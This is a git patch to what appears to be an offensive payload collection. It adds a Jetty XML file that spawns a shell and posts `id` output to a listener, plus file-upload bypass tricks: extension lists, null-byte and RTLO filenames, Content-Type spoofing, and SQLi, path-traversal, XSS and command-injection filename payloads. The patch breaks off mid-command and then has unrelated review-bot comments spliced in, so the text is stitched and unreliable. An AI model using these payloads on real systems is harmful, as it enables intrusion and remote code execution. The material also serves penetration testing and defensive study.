From fa849c00f234b3972aaa35622846ab50e97573ab Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 9 Aug 2022 22:05:45 +0200 Subject: [PATCH] Jetty RCE + Upload tricks --- .../Jetty RCE/JettyShell.xml | 15 ++++++ Upload Insecure Files/README.md | 54 ++++++++++++++----- 2 files changed, 55 insertions(+), 14 deletions(-) create mode 100644 Upload Insecure Files/Jetty RCE/JettyShell.xml diff --git a/Upload Insecure Files/Jetty RCE/JettyShell.xml b/Upload Insecure Files/Jetty RCE/JettyShell.xml new file mode 100644 index 0000000..769376c --- /dev/null +++ b/Upload Insecure Files/Jetty RCE/JettyShell.xml @@ -0,0 +1,15 @@ + + + + + + + + /bin/sh + -c + curl -F "r=`id`" http://yourServer:1337/ + + + + + \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index a6b11a9..3f5bfba 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -14,6 +14,7 @@ * [CVE - Image Tragik](#cve---image-tragik) * [CVE - FFMpeg](#cve---ffmpeg) * [ZIP Archive](#zip-archive) + * [Jetty RCE](#jetty-rce) * [References](#references) @@ -44,14 +45,22 @@ .phtm .inc ``` -* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0), shell.soap` -* JSP : `.jsp, .jspx, .jsw, .jsv, .jspf` +* ASP Server + ```powershell + .asp + .aspx + .config + .cer and .asa # (IIS <= 7.5) + shell.aspx;1.jpg # (IIS < 7.0) + shell.soap + ``` +* JSP : `.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action`s * Perl: `.pl, .pm, .cgi, .lib` * Coldfusion: `.cfm, .cfml, .cfc, .dbm` ### Upload tricks -- Use double extensions : `.jpg.php` +- Use double extensions : `.jpg.php, .png.php5` - Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg` - Random uppercase and lowercase : `.pHp, .pHP5, .PhAr` - Null byte (works well against `pathinfo()`) 
@@ -63,7 +72,10 @@ * `.php\x00.jpg` - Special characters * Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed. - * Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg` + * Whitespace and new line characters + * `file.php%20` + * `file.php%0d%0a.jpg` + * `file.php%0a` * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`. * Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp` * Multiple special characters: `file.jsp/././././.` @@ -71,6 +83,7 @@ * `Content-Type : image/gif` * `Content-Type : image/png` * `Content-Type : image/jpeg` + * Content-Type wordlist: [SecLists/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt) * Set the Content-Type twice: once for unallowed type and once for allowed. - [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures) * Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application. 
@@ -82,15 +95,21 @@ ### Filename vulnerabilities +Sometimes the vulnerability is not the upload but how the file is handled after. You might want to upload files with payloads in the filename. + - Time-Based SQLi Payloads: e.g. `poc.js'(select*from(select(sleep(20)))a)+'.extension` -- LFI Payloads: e.g. `image.png../../../../../../../etc/passwd` +- LFI/Path Traversal Payloads: e.g. `image.png../../../../../../../etc/passwd` - XSS Payloads e.g. `'">.extension` - File Traversal e.g. `../../../tmp/lol.png` - Command Injection e.g. `; sleep 10;` +Also you upload: +- HTML/SVG files to trigger an XSS +- EICAR file to check the presence of an antivirus + ### Picture upload with LFI -Valid pictures hosting PHP code. Upload the picture and use a local file inclusion to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`. +Valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`. - Picture Metadata, hide the payload inside a comment tag in the metadata. - Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`. @@ -102,19 +121,20 @@ Create a custom picture and insert exif tag with `exiftool`. A list of multiple ```ps1 convert -size 110x110 xc:white payload.jpg exiftool -Copyright="PayloadsAllTheThings" -Artist="Pentest" -ImageUniqueID="Example" payload.jpg +exiftool -Comment="
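Review bot: the new `Upload Insecure Files/Jetty RCE/JettyShell.xml` is committed without a trailing newline (`\ No newline at end of file`); add one so later diffs of this file stay clean. The `http://yourServer:1337/` host and port are placeholders the reader has to replace, and the command only posts the output of `id` back to that listener, so the file is a proof-of-execution check rather than an interactive shell despite its name; both points should be stated in the README section that the new `Jetty RCE` TOC entry points to.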
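Review bot: the TOC entry `* [Jetty RCE](#jetty-rce)` needs a matching `Jetty RCE` heading in the README, and none appears in the visible hunks of this patch; confirm the section is added in the same change, otherwise the anchor is a dead link.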
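Review bot: in the JSP line, `.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action`s` has a stray `s` after the closing backtick; drop it. The new ASP Server block is fenced as ```` ```powershell ```` although it only lists file extensions, which is misleading; use the same untagged fence the PHP list just above it uses. The added `.config` entry also lacks the server-version qualifier its neighbours carry (`.cer and .asa # (IIS <= 7.5)`), so either add the qualifying comment or note that it applies regardless of version.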
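Review bot: drive-by in the unchanged context of the whitespace hunk: `will became` should be `will become`; since this hunk already touches the surrounding lines, fix it here rather than in a separate change.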
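Review bot: `Also you upload:` reads as a fragment; make it `You can also upload:`. In the new intro sentence, `how the file is handled after` should be `how the file is handled afterwards`. The renamed `LFI/Path Traversal Payloads` bullet now overlaps with the existing `File Traversal` bullet two lines below it (`../../../tmp/lol.png`); consider merging the two, or say in each what distinguishes it.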